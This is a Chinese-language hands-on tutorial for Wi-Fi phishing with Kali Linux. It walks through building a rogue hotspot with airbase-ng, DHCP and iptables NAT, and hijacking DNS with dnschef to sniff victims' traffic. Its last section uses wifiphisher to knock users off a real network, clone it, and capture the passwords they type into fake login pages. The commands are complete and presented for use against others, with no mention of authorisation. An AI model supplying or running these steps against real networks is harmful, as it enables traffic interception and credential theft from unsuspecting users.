电子证据 利用Kali进行wifi钓鱼实战详细教程
一、 Kali系统安装和必要软件安装:
- 1.Kali最新版可以来我这儿拿外置驱动和光盘装,目测用U盘装最新版有些问题,比较麻烦。
-
2.Kali更新源配置(没网络可以连接Wifi):shell 运行 gedit /etc/apt/sources.list #指打开 /etc/apt目录下的sources.list文件
然后复制:#中科大kali源
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
然后保存即可。关闭后,再输入:apt-get update && apt-get dist-upgrade,回车。等待更新。 - 3.更新源后,输入:apt-get install isc-dhcp-server,回车。如出现依赖关系,把依赖关系的软件卸载即可(命令:apt-get remove xxx)xxx代表软件名。
二、利用kali建立钓鱼wifi:
建立热点
工具:isc-dhcp-server ;Aircrack-ng套件;iptables
isc-dhcp-server上面已装,其他的kali自带。
shell输入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打开文件命令,如没有这个文件,则创建。
写入如下内容:
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
}
这里以10.0.0.1作为网关和dns服务器地址。
然后我们处理无线网卡
ifconfig wlan1 down #wlan1是你的网卡 这里意思是关闭wlan1网卡
iwconfig wlan1 mode monitor #设置wlan1网卡为监听模式
ifconfig wlan1 up #打开wlan1网卡
airmon-ng start wlan1 #启动wlan1网卡的监听模式
上述命令可以防止出现:Error: Got channel -1, expected a value > 0.
然后用airbase建立热点
airbase-ng -e Fishing -c 11 wlan1 #创建名为Fishing的热点,Fishing 自己改。
热点的网络流量会被虚拟到at0这块网卡上面
ifconfig at0 up #启用at0这块网卡
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩码
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由
echo 1 > /proc/sys/net/ipv4/ip_forward #打开ip转发
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start #开启 dhcp
然后可以试着用手机连接,应该可以连上但上不了网
于是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp –(两个-)syn -s 10.0.0.0/24 -j TCPMSS –(两个-)set-mss 1356 #修改最大报文段长度
注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)
(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)
劫持DNS
工具:dnschef
过程:
dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,对于所有请求转发到61.128.128.68进行解析。
然后就可以用wireshark等工具抓包啦!
三、wifiphisher:
(要买一个无线网卡,淘宝23元一个,团购免邮费)
这是一个wifi攻击脚本,详细介绍地址:https://github.com/sophron/wifiphisher
先,我们来下载wifiphisher:
在shell框里输入命令:
git clone https://github.com/sophron/wifiphisher.git
等待下载完毕,然后你可以在你下载的目录下看见wifiphisher这个文件夹。然后在这个文件夹运行 shell.
输入命令:python bin/wifiphisher
如果是第一次运行脚本的话,它可能会出现提示安装hostpad的信息,键入Y继续安装即可。
完成的时候,再次运行Wifiphisher脚本。
这次将运行8080和433端口的Web服务器,然后开始搜索附近的Wi-Fi网络。
等待搜索完成,我们会发现一系列Wi-Fi网络名。
然后按Ctrl+C 选择攻击的wifi
出现1、2、3三种模式,这三种模式代表发送不同的验证页面给连接的用户,具体的页面文件在wifiphisher目录下的 attack page中。也可以自己写一个。
敲下回车,Wifiphisher会显示正在使用的界面,还有正被攻击及复制的AP所在的SSID。
然后已连接件被攻击wifi的用户会被强制断开,wifiphisher会copy这个被攻击的wifi,做一个伪装wifi(原理就如第二步),然后断开的用户将会再搜索到的是这个伪装wifi,当他们连接这个wifi时会接受到一个验证页面(3种模式有3种不同的页面),然后会要求用户输入密码,当用户输入密码提交后,你将会看见这个密码。
如果他们连上这个伪装wifi,你就可以用wireshark等工具进行抓包啦~~!